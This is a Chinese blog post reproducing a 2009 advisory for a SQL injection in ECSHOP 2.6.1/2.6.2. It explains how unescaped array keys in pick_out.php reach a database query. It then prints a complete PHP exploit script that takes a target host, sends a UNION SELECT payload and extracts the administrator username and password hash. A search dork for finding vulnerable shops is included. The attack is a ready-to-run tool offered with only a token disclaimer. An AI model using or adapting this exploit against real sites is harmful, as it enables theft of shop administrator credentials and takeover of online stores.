飘零的代码 piao2010 ’s blog

添加时间:
2009-05-25

系统编号:
WAVDB-01431

影响版本:
ECSHOP 2.6.1/2.6.2

程序介绍:
ECSHOP是一款开源免费的网上商店系统。由专业的开发团队升级维护，为您提供及时高效的技术支持，您还可以根据自己的商务特征对ECSHOP进行定制，增加自己商城的特色功能。

漏洞分析:

文件includes/init.php判断get_magic_quotes_gpc(),如果为off则调用addslashes_deep():

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60

// includes/init.php
if (!get_magic_quotes_gpc())
{
    if (!empty($_GET))
    {
        $_GET  = addslashes_deep($_GET);
    }
    if (!empty($_POST))
    {
        $_POST = addslashes_deep($_POST);
    }
 
    $_COOKIE   = addslashes_deep($_COOKIE);
    $_REQUEST  = addslashes_deep($_REQUEST);
}
 
addslashes_deep()在文件includes/lib_base.php里最后通过addslashes()处理
 
// includes/lib_base.php
function addslashes_deep($value)
{
    if (empty($value))
    {
        return $value;
    }
    else
    {
        return is_array($value) ? array_map('addslashes_deep', $value) : addslashes($value);
    // 只处理了数组的值:)
    }
}
 
下面看下具体的导致漏洞的代码,文件 pick_out.php里:
 
// pick_out.php
if (!empty($_GET['attr']))
{
    foreach($_GET['attr'] as $key => $value)
    {
        $key = intval($key);
        $_GET['attr'][$key] = htmlspecialchars($value);
        // foreach处理的是指定数组的拷贝,所以这里的处理并不影响数组原先的key和value
        // 因此可以引入任意的key:)
        // 程序员的逻辑出了问题?
    }
}
...
        foreach ($_GET['attr'] AS $key => $value)
        {
            $attr_url .= '&attr[' . $key . ']=' . $value;
 
            $attr_picks[] = $key;
            if ($i > 0)
            {
                if (empty($goods_result))
                {
                    break;
                }
                // 利用key进行注射:)
                $goods_result = $db->getCol("SELECT goods_id FROM " . $ecs->table("goods_attr") . " WHERE goods_id IN (" . implode(',' , $goods_result) . ") AND attr_id='$key' AND attr_value='$value'");

由于magic_quotes_gpc=off时没有对$key处理,同时在数组赋值时存在逻辑问题,最终导致了注射漏洞:)

漏洞利用:

#!/usr/bin/php
< ?php
//本程序只作技术交流，请不要用做非法用途！！
print_r('
+---------------------------------------------------------------------------+
ECShop <= v2.6.2 SQL injection / admin credentials disclosure exploit
by puret_t
mail: puretot at gmail dot com
team: http://bbs.wolvez.org
dork: "Powered by ECShop"
+---------------------------------------------------------------------------+
');
/**
* works with magic_quotes_gpc = Off
*/
if ($argc < 3) {
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host: target server (ip/hostname)
path: path to ecshop
Example:
php '.$argv[0].' localhost /ecshop/
+---------------------------------------------------------------------------+
');
exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);

$host = $argv[1];
$path = $argv[2];

$resp = send();
preg_match('#IN\s\(([\S]+):([a-z0-9]{32})\)#', $resp, $hash);

if ($hash)
exit("Expoilt Success!\nadmin:\t$hash[1]\nPassword(md5):\t$hash[2]\n");
else
exit("Exploit Failed!\n");

function send()
{
global $host, $path;

$cmd = 'cat_id=999999&attr[%27%20UNION%20Select%20CONCAT(user_name%2c0x3a%2cpassword)%20as%20goods_id%20FROM%20ecs_admin_user%20Where%20action_list%3d%27all%27%20LIMIT%201%23]=ryat';

$data = "GET ".$path."pick_out.php?".$cmd." HTTP/1.1\r\n";
$data .= "Host: $host\r\n";
$data .= "Connection: Close\r\n\r\n";

$fp = fsockopen($host, 80);
fputs($fp, $data);

$resp = '';

while ($fp && !feof($fp))
$resp .= fread($fp, 1024);

return $resp;
}

?>

解决方案:
厂商补丁
ECSHOP
———-
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
http://www.ecshop.com

信息来源:
< *来源: ryat#www.wolvez.org
链接: http://www.80vul.com
*>

相关日志

• 暂无相关日志

Tags: ECSHOP注入

This entry was posted on 星期三, 5月 27th, 2009 at 09:40 and is filed under 0day. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.